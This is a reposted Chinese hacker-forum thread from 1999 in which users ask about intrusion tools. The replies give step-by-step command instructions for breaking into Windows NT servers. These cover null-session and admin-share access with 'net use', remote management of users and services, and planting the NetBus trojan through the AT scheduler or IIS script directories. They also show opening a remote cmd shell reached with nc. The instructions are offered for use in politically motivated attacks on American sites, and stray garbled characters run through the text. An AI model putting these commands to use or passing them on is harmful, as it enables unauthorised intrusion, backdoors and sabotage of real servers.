《版主页黑客工具和文章的几个问题》中提到:. ^- p" K9 F" c* K
请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。
( V2 V( X+ i1 Q1 L& o- n> 我的机子MMX166,WIN98,2。5G,32M内存。
" h' d: @1 I& }7 Z) V) C' {) @2 b, T" ]' }6 a8 z5 F
黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。
) Z* x& R) _9 g! J6 l你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。. v6 |3 e5 ^# Q, q( p% t' N8 ^
其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:# n2 X6 _& W: ]# y' v# R
net use \\111.111.111.111\ipc$ "" /user:""- D" Z3 o" M" p6 K! R
net.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:7 ]% w* G& k U1 E- ^1 s8 a
net view \\111.111.111.111
5 _( C) I& f% A# Z% t当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:" q! n& W t- w! j
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"/ B4 U9 V4 ^% P9 r, |# M% x
命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:
7 Q) K+ L- T& }5 h: {1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:5 ^: R& T9 @4 d( ]! `
net use x: \\111.111.111.111\c$
% k9 c7 f+ H) Xnet use y: \\111.111.111.111\d$
' E, p% g) D$ n这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...
; }, N; O, ^) L+ R2、管理目标NT的用户:; q; P4 Y' H& S" x' {5 t$ I
从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”- ^8 ^+ c0 z4 V$ ^/ B
键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样) r* k: O0 k: O, e7 |
3、管理目标NT的服务
4 B, a- {3 ~! }' I, ]# [6 R选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”
" k& d# ]: b" Q6 W) u这样你可以管理目标NT上的服务,共享目录
5 w0 U, W3 i/ x8 e0 }& F4、IIS管理( g- ~6 k' I0 ~+ K8 \- ^9 B. V
选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
: ^5 s& T. c4 I( q/ Y9 T目标NT的FTP、WWW服务你就可以重新配置" q- N9 `( `% B; }1 p+ v: ^& K9 k
5、事件管理: r: q; S: L) K0 j; u% |
“事件查看器”->连接到服务器->111.111.111.111
' N. j% P& H2 J0 |% s
# F$ l+ ^1 T9 m& u: s0 m& a还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。
/ _/ V9 `) m0 M. O; r; `& [5 ?; V
当然,98,95也能做一些事情,但很麻烦,比如:5 i, Q; }" ^6 R9 L$ C* r
net use \\111.111.111.111\ipc$
D/ U! M( m1 p- pnet use z: \\111.111.111.111\d$ y- x3 z) A l9 m( X$ e, }
但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等
# j: h4 E1 Y; t) R. a J7 k# u0 F2 |0 b
我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!
: O. C! i, p6 |5 R$ c- [这样,你还可以了解目标机器上能有什么东东供你去用!+ q( p7 [4 J- g2 ~& d4 m
+ w# `- h) Z8 C6 H h0 n) x( Y
4 t$ O" t) i( M1 z) u+ u$ a--------------------------------------------------------------------------------& f( Q# O/ Y/ O+ ~
7 ]" x% D7 W) w8 q* p8 Z>quack于1999-06-12,23:37:44
, o* [7 Y) ~& ]" X: D4 c2 I在大作《几个有关黑的问题》中提到:" o$ S- i- S9 V% w$ V2 F
首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。( ]/ W' B/ }4 u9 k# a+ G! I+ C
; z, H( @* F( v4 j, T. ?) D8 c
killusa于1999-06-13,03:25:15
) h9 [: Q' Y8 Y5 o0 b- U3 }. ~在大作《Re: 几个有关黑的问题》中提到:
5 @. T) H. Y8 [( t* M& T6 r
+ [4 r5 {& J+ gletmein.exe 暂时没有mypwd参数,十分抱歉
. f4 O s2 ?, O" ^# {# jpinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。
/ l% n" I$ ?! h* N2 U; Q5 R, @) a* D
Netbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的. P5 C$ {4 c+ y. Q" Y6 m# F
服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:6 a( X( P t) I2 W
% V3 H3 L. [5 B0 }
1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:
7 I$ U: `8 d+ \3 ~* `2 [" N# r3 N# t6 W2 s- k0 W0 O7 e( m4 _! c
C:\>net start schedule0 Q8 w4 Q! \, q
Schedule 正在启动服务...... m2 X/ B) m5 ]) h6 d/ }4 L8 w9 Z/ W, ^$ g
Schedulw 服务启动成功。$ O7 g1 [: x: v
C:\>at /?
* G. M' F' _* |) [) y+ fAT 命令排定在特定的日期和时间运行某些命令和程序。
4 u) G4 R( k6 p7 q3 [5 ~运行 AT 命令之前必须先启动 Schedule 服务。
X4 K* j3 L% {5 F3 }& K) I ]* I8 v, `# w6 [; x! r- `5 e
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]+ W# O8 B8 ?( O, F. @: _
AT [\\computername] time [/INTERACTIVE]
' d$ [' _0 U% B2 P3 A+ H4 t( v[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
6 _3 X# y, X7 K. S+ x8 \5 N9 M. s) [# ^
\\computername 指定远程计算机。 如果省略这个参数
5 y- x% v6 g" m& O3 _, I1 B% _命令会被排定在本机上运行。* i+ W0 `0 ~" T r
id 指定给排定进度命令的识别号。
1 ~+ Y9 G, a9 i
- T* }: J: M3 s# ?/ [/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。5 x* }+ t0 x/ h1 m' V
/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。
; Z- b. K5 o9 F Ntime 指定命令运行的时间。2 ^/ S$ B P& P( \
/interactive 允许作业在运行时,与用户通过桌面交互。
" [6 L1 m& z4 L5 _( [8 ^+ R1 D6 ^( ^. L6 D' k$ R
/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。& D' x& S% h) i; D/ O1 Q
如果省略日期,则默认为在每月的本日运行。
) \; a( X. t6 I% B* l! I# p+ Q* C& ]) H3 r
/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。
$ f9 C: P' U$ C* O1 W9 y* {- n0 T" N+ D$ }1 V; a
"command" 准备运行的 Windows NT 命令或批处理文件。
. _7 q9 i$ }9 M! k/ D: [$ X2 f; _! S% e( u i2 r
C:\>2 [; t) b* i7 e* z7 s( j
' S% Y* L) P. t. S7 k% U
知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:
6 h+ M4 V5 r% d3 n; C1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser") l" i' ^& J8 @4 Y
2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start3 x0 A) u% h4 y
3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:
. ?; @2 u$ C, b* s+ q0 R" kat \\x.x.x.x 00:00 ntsrv.exe /port:64321
9 z4 i. r: g1 w' E$ v6 e其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:( Z3 n& w: v$ d$ f; |
Microsoft(R) Windows NT(TM)/ ?/ K1 x" S0 ^, |. U" |- o
(C) Copyright 1985-1996 Microsoft Corp.
, C; v) F- T6 Y1 k2 `% ^C:\>
; I. o2 v& K r2 Z& K, i' F9 n, W* D9 | n- w& H
2、利用web启动ntsrv.exe或其他程序在目的服务器
# }( D4 D# n: C: C; x; c6 A- Q3 Q1 d" ?& e4 I. k2 d
将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:
! E2 m: v6 Z" thttp://x.x.x.x/scripts/ntsrv.exe /port:64321! _ J3 C, w p* I T& D8 U7 N$ [: b
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321$ r) N; b/ r h' {4 m! y
该程序就启动了
$ r9 @$ p# i y9 }
0 M4 G5 o* R# \. H! w我只提这几中方法!
4 g9 I5 B, L% ?要成功,必须打好基础工,对操作系统充分了解!& A2 p3 d- s' }. N
& ?' V( d/ D8 s. W
|
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-13 17:03:28
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡